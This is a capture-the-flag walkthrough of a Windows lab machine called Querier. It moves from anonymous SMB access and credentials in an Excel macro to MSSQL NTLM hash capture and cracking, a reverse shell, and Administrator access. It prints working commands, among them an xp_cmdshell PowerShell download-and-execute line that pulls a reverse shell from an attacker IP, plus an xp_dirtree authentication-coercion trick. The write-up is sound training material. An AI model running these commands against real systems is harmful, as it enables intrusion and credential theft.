Overview

Querier is a Windows machine focused on SMB enumeration, Microsoft SQL Server abuse, NTLM hash capture, and privilege escalation through exposed credentials.

The machine demonstrates how seemingly harmless files stored on SMB shares can lead to full system compromise through credential exposure and lateral movement.


Attack Path Summary

Reconnaissance
Anonymous SMB Access
Excel Document Discovery
MSSQL Credential Recovery
MSSQL Access
NTLM Authentication Capture
Password Cracking
MSSQL Service Account Access
Remote Shell
Credential Discovery
Administrator Access

Reconnaissance

Nmap Scan

Initial enumeration identified a Windows host exposing SMB, MSSQL, and WinRM services.

nmap -sVC -Pn -oA nmap/querier 10.129.38.188

Relevant services:

445/tcp  open  microsoft-ds
1433/tcp open  Microsoft SQL Server 2017
5985/tcp open  WinRM

The presence of MSSQL immediately stood out as a potentially valuable attack surface.


SMB Enumeration

Enumerating SMB shares revealed an accessible share named Reports.

smbclient -L //10.129.38.188/
Reports

Anonymous SMB access was allowed on the target.

Accessible shares often contain sensitive documents, configuration files, or embedded credentials.


File Discovery

Browsing the Reports share revealed an Excel spreadsheet.

Currency Volume Report.xlsm

The file was downloaded for further analysis.


Initial Foothold

Macro Analysis

The spreadsheet was inspected using olevba.

olevba Currency\ Volume\ Report.xlsm

The embedded VBA code contained a SQL connection string.

Uid=reporting
Pwd=PcwTWTHRwryjc$c6

Recovered credentials:

reporting:PcwTWTHRwryjc$c6

These credentials appeared to belong to a Microsoft SQL Server account.


MSSQL Access

Using the recovered credentials, authentication to MSSQL was successful.

impacket-mssqlclient QUERIER.HTB/reporting:'PcwTWTHRwryjc$c6'@10.129.38.188 -windows-auth

Although access was obtained, the account lacked sufficient privileges to enable xp_cmdshell.


NTLM Hash Capture

Since direct command execution was unavailable, the MSSQL server was forced to authenticate to an attacker-controlled SMB share.

Responder was started:

sudo responder -I tun0

Then MSSQL was instructed to access a remote share:

xp_dirtree \\10.10.14.62\share

The xp_dirtree procedure can trigger outbound SMB authentication.

When directed toward an attacker-controlled system, NTLM hashes may be captured and cracked offline.

Responder captured an NTLMv2 hash belonging to:

QUERIER\mssql-svc

Cracking the NTLM Hash

The captured hash was cracked using Hashcat.

hashcat -m 5600 mssql-svc.hash /usr/share/wordlists/rockyou.txt

Recovered credentials:

mssql-svc:corporate568

MSSQL Service Account Access

Authenticating with the newly recovered credentials provided significantly higher privileges.

impacket-mssqlclient QUERIER.HTB/mssql-svc:'corporate568'@10.129.38.188 -windows-auth

This account was allowed to execute xp_cmdshell, enabling operating system command execution.


User Flag

xp_cmdshell "powershell type C:\Users\mssql-svc\Desktop\user.txt"

User access was successfully obtained.


Reverse Shell

To gain an interactive shell, a Nishang PowerShell reverse shell was executed.

xp_cmdshell "powershell -c IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.62/Invoke-PowerShellTcp.ps1')"

A reverse shell connected back as:

mssql-svc

Privilege Escalation

PowerUp Enumeration

With interactive access established, PowerUp was used to identify privilege escalation opportunities.

Invoke-WebRequest -Uri "http://10.10.14.62/PowerUp.ps1" -OutFile "PowerUp.ps1"

Enumeration revealed credentials stored on the system.

Administrator:MyUnclesAreMarioAndLuigi!!1!

Credential exposure remains one of the most common privilege escalation vectors on Windows systems.

Automated enumeration tools such as PowerUp can quickly identify these opportunities.


Administrator Access

The recovered credentials were used to authenticate through WinRM.

evil-winrm -u Administrator -p 'MyUnclesAreMarioAndLuigi!!1!' -i 10.129.38.188

Administrative access was successfully obtained.


Root Flag

type C:\Users\Administrator\Desktop\root.txt

The machine was fully compromised.


Skills & Concepts

  • SMB Enumeration
  • Excel Macro Analysis
  • MSSQL Enumeration
  • NTLM Hash Capture
  • Responder Usage
  • Password Cracking
  • MSSQL Abuse
  • Reverse Shells
  • Windows Privilege Escalation

Tools Used

  • Nmap
  • SMBClient
  • Olevba
  • Impacket
  • Responder
  • Hashcat
  • Nishang
  • PowerUp
  • Evil-WinRM

Lessons Learned

Querier demonstrates how sensitive information stored in shared documents can lead directly to system compromise.

Key takeaways include:

  • Enumerating SMB shares thoroughly
  • Inspecting Office documents for embedded credentials
  • Leveraging MSSQL functionality for authentication coercion
  • Capturing and cracking NTLM hashes
  • Using MSSQL for command execution
  • Enumerating Windows privilege escalation opportunities
  • Identifying exposed credentials on compromised systems

The machine also highlights the dangers of credential reuse and insecure storage of administrative passwords.